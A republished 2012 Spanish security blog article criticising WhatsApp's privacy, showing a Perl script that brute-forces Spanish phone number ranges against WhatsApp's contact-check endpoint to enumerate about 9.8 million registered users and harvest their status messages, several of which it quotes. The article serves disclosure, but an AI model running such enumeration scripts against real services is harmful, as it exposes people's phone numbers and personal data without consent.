Artículo de [Alejandro Ramos][1] publicado en [Security By Default][2], espacio donde poder compartir experiencias y hablar de los aspectos técnicos relacionados con la seguridad informática, con [licencia Creative Commons Reconocimiento-No Comercial España][3] el [2 de marzo de 2012][4].
Hemos realizado ligeros cambios -cursivas, negritas, enlaces- en la edición en aras de una mejor comprensión del texto.
No hemos cambiado el título aunque habría que añadir a Casi 10 millones de móviles españoles con WhatsApp instalado, constituyen un peligro para la privacidad de lxs usuarixs. Lo reproducimos porque nos parece muy importante que lxs usuarixs sepamos los problemas que tienen las aplicaciones que usamos, los riesgos que conlleva dejarse llevar por la moda de un uso masivo irreflexivo y sin ninguna postura crítica. Realmente WhatsApp hace algo que con [Jabber][5] ya se puede hacer, bien sea en un servidor comercial como de hecho hace Google con Ytalk, bien en un servidor cooperativo o comunitario como [Jabberes.org][6]. Sin embargo, la facilidad de uso, el boca-oreja y sobre todo la moda ha hecho de WhatsApp la aplicación instalada en diez millones de móviles de España. ¿Qué ocurre con la tecnología y el uso que hacemos de ella?

[Whatsapp, fondo de escritorio por http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/][7]
Whatsapp, fondo de escritorio por http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/

Casi 10 millones de móviles españoles con WhatsApp instalado

¡Qué pesados somos con [whatsapp][8]! Ya, bueno, eso es mentira. Realmente somos pesados con todo. Haciendo algunos ejercicios con aplicaciones de [iPhone][9], me dio por mirar  un poco WhatsApp, como [ya hiciera Yago][10] o [Alberto antes][11], pero es que la aplicación da tanto juego, que se puede hablar de ella muchas más veces.
Una de las cosas que observé en ese análisis es que cuando arranca, comprueba el estado de tus contactos y de esa forma, sabe qué personas de tu agenda usan el servicio. Esta petición se realiza mediante HTTPS contra su servidor web con una llamada muy simple a la URL: https://sro.whatsapp.net/client/iphone/iq.php, que devuelve un plist con sus mensajes y disponibilidad.
`


P
+34600000158
T
6151511
S
Hey there! I am using WhatsApp.
JID
34600000158
NP


`
El resto de esta entrada,  pues ya os lo podéis imaginar: script en perl, lista de teléfonos registrados de España y a probar y cotillear cuantos hay usando el servicio y qué estados graciosos hay. ¿Aburrido? No, ¡inquieto!
La lista de prefijos de teléfono registrados es pública y se puede descargar en un fichero zip de esta página web: [http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&categoria=descarga][12]

El script en perl no es que soporte threads ni sea nada del otro mundo, pero oye… funciona.
`</p>

#!/usr/bin/perl
use LWP::UserAgent;
my $ua = new LWP::UserAgent;
open A,"num.txt";
my @a=;
my $i=0;
foreach my $b (@a){
chomp $b;
foreach $g (0..99) {
$i++;
my $post="";
$post="cd=1&cc=34&me=600000000";
foreach(0..9999) {
$post .= sprintf ("&u%%5B%%5D=%%2B34$b%02d%04d",$g,$_);
}
print "get $in";
my $req = new HTTP::Request 'POST','https://sro.whatsapp.net/client/iphone/iq.php';
$req->content_type('application/x-www-form-urlencoded');
$req->content("$post");
my $res = $ua->request($req);
print $res->as_string;
}
}
` El resultado, cuando lo ejecuté el 10 de febrero y tras generar un *log* de 2 *Gb*: **9.832.654** de números registrados. Y algunos estados de gente graciosos: **HACKERS:** pirateando conversaciones, menuda hacker Xx\_Hackero\_xX The Mind Hackers is Here!!! HACKERMAN !!! I’m not a Hacker, I’m a "Security Professional" Hacker \*\\*\* Hacker. Hacker \*\** Hacker mater hacker Hacker î Heart Hacker Rembo Now Is Here Hacker Soy una hacker!!!!…patosa!!!î MaDr!D HaCKeR De Hacker por la Red Hacker The HACKER De examenes toda la semana.. Certified Ethical Hacker Don’t Panic! A ‘hacker’ is different from a ‘cracker’. Te reviento hacker!! Jaja ~Hacker~ android hacker @andyyhacker Quien viene a ver Hackers????? Hacker, Blade Runner. ahhahah soy un porulo hacker :Pî ½ Hackerdelmelo is hacking OFM Saber romper medidas de seguridad no hacen k seas hacker al igual que saber hacer un puente en un coche no te convierte en un ingeniero Me sty volviendo hacker Xx\_putoshackers\_xX el puto hacker î®HACKERî® Y si, morire de frio o de sueño, quiero ser hacker u3u el hacker crea y el gobierno destruye VOTAD x ROLLING HACKERS!!! Los hackers son los padres Cagüen el hacker… îMarzo Negro.contra la ley sopa.ANONYMUS planea el mayor atake hacker Certified Ethical Hacker Mi Objetivo: Hacker de la vida **SECURITY** I’m not a Hacker, I’m a "Security Professional" Ibiza Security Shadows Are Security Buguroo Offensive Security Gordo Te amo (L) bailar,bailar,bailar! Security dance! :) mucha fiesta y muchas actuaciones! :p the security men SecurityViolationException: empty head on ‘remote_user’:47 Panda Security – cloudantivirus.com Ibiza Security Your Security is my Business… Paid off security and got through the gate… I’ll be ur security!! security!!!! ai ai ai ai security private î con dos cojones vamos a x elloî Grupo Security Dogs internet and security terrorims Y finalmente, uno de mis favoritos: **<****string>Yo no digo que esa chica sea un poco suelta, solo digo que si su entrepierna tuviera contraseña, serí­a ‘1234’**<**/string****>** [1]: http://www.twitter.com/aramosf [2]: http://www.securitybydefault.com/ [3]: http://creativecommons.org/licenses/by-nc/2.5/es/ [4]: http://www.securitybydefault.com/2012/03/casi-10-millones-de-moviles-espanoles.html [5]: http://www.jabber.org/ [6]: http://www.jabberes.org/ [7]: http://www.flickr.com/photos/abulhussain/5017703003/sizes/o/in/photostream/ [8]: http://www.whatsapp.com/ [9]: http://store.apple.com/es/browse/home/shop_iphone/family/iphone [10]: http://www.securitybydefault.com/2011/06/lo-que-no-te-cuenta-whatsapp.html [11]: http://www.securitybydefault.com/2012/01/whatsapp-al-descubierto.html [12]: http://www.cmt.es/cmt_ptl_ext/SelectOption.do?nav=bases&categoria=descarga